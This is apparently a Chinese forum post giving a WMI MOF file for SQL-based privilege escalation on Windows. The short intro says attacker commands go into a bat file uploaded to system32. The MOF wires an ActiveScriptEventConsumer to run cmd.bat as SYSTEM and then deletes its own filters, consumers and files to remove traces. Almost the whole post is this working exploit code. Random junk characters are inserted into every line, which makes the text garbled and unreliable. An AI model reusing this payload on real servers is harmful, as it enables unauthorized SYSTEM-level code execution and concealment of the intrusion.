这个sql提权MOF需要运行 system下的文件,不能定义路径。4 |. p+ j' d( i
需要将要运行的命令写入到bat上传到system32目录,然后执行。
0 x a& I" N* |2 W& e
I$ F9 E+ K4 Q+ E3 k/ e- u* I这个sql提权MOF需要运行 system下的文件,不能定义路径。
7 @; ]! \$ Q: }3 _9 \需要将要运行的命令写入到bat上传到system32目录,然后执行。
6 Q0 D# W6 B& a. |
( b& n0 K( ]( V' T- U#pragma" q1 v5 _. h; O0 q& T. O+ b; L
namespace("\\\\.\\root\\cimv2")% m* v8 ]& A, ^5 e; C+ g
class
- F- Y6 L! _' Q0 ` MyClass547
$ M9 }: ]0 j5 j& i- u { [key]
2 m7 d* P, v( m string
- r7 u1 h/ G `# C0 n8 S8 U Name;7 i# A% K" `, l5 Q+ B5 X
};, S* y% e0 S% r& |2 V" Z+ R. t
class4 X; m5 w% c+ X6 u3 T+ o! Y* H6 T7 h
ActiveScriptEventConsumer0 x- r, ?, G1 n! P3 j0 h
: __EventConsumer { [key]1 e. i. x3 W, x# \$ T
string* d9 w6 h2 h" C) }6 M, G
Name; [not_null]* B) [3 D7 a1 \ t0 a! [
string2 `# k, I* @" o% r; z4 ?! `
ScriptingEngine; string; v/ C9 a% |/ ]3 _' [; y" r
ScriptFileName; [template]
5 ~6 u# b$ Y6 p6 {2 s: l, O string
# F1 |. H- V6 _8 d6 p2 K1 _" | ScriptText; uint32 KillTimeout;
) X6 ~# b7 s: D$ @ }; instance of __Win32Provider as $P {
: `3 M( Z( n- H) }# n Name. R% T V* X# U8 o' R+ v, z
=
, `3 m5 Y* N! b: r! T9 C8 v7 |% O. q "ActiveScriptEventConsumer"; CLSID =
; ~1 M1 }% z. P' W "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";% u% P6 e$ P, F' G
PerUserInitialization) A" F9 K' S/ M& o" p2 I" i
= TRUE;
# }. _( S/ B4 I4 [& x0 } }; instance of __EventConsumerProviderRegistration { Provider) y+ s9 k [. m- I( A8 \* n
= $P; ConsumerClassNames
% }% U$ W: H# C, J7 c: s+ Y =
7 R0 Y0 z, j- e0 y3 z. e6 K {"ActiveScriptEventConsumer"};
3 ^1 @8 _( l" |1 ^! \ w$ H& w% g6 x };
: g/ v W% k: s* J, w Instance of ActiveScriptEventConsumer, \1 W- \! H$ }4 t+ _; i
as $cons { Name
' L) _3 u' A( G; x' t* O7 i =
0 {3 i7 I! C, a3 u; ` "ASEC"; ScriptingEngine5 A& W# p) o/ P& i2 S6 `
=. r2 m* d, ?/ D, W4 j" N
"JScript"; ScriptText
9 l, j: W( p' ]* [, v0 K* u8 E =
3 n/ o( r0 p0 ~ "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
" V. ^; Y: B5 I Instance of ActiveScriptEventConsumer
* _! ^4 m& Q2 M& t; c as $cons2 { Name. h# Z6 Q/ Y/ c5 K
=/ Z( ^& h" b: h
"qndASEC"; ScriptingEngine
7 I9 l1 ]* W8 s3 Q9 c& E =9 d) m5 K8 |" E
"JScript"; ScriptText
, q+ e* }: v% e& ]$ ~) |( O3 H =% w9 ?" i9 t7 U0 f2 F; O: t, V' t
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";0 W% @ ^% s, f' d, d& f
}; instance of __EventFilter as $Filt { Name
! o* Y' U6 L O =
: v* @+ J4 u8 O3 `( s. }, x "instfilt"; Query- x; J9 ^9 U7 h# a7 N: P2 S- N
=/ b- G2 M: o$ ?& |1 c: q
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage# V% o- H3 M- f5 T
=1 `( ]5 C9 f8 q# T* n: R
"WQL"; }; instance of __EventFilter as $Filt2 { Name9 l! G, `- W( }% H, b
=
! B, X9 T: @8 h3 T# j& _/ m "qndfilt"; Query4 y8 i5 Q, f6 Y
=
( h4 s: ^& J2 o! C4 A "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage m3 R) r5 c4 @
=
) B y% }6 Q: h) I% R "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer$ ]% d0 ~+ r6 p- @7 {( _
= $cons; Filter( K+ k/ t G' t) S$ b
= $Filt;
. ]4 d" R X5 S# V3 A( G, | l }; instance of __FilterToConsumerBinding as $bind2 { Consumer
; O7 a) y, M1 B. ^% b+ s7 C = $cons2; Filter
% u* @- X Y- [! L = $Filt2;: z) m9 x! K+ {2 \
}; instance of MyClass547. S# M0 b* i$ Y( \5 r9 A$ f( s/ b
as $MyClass { Name
+ ?; e) ~9 F% I2 c- [ ?8 d =' }9 f6 X, M5 O" f: S2 ^% Q
"ClassConsumer";; w- `. I$ G u
}; |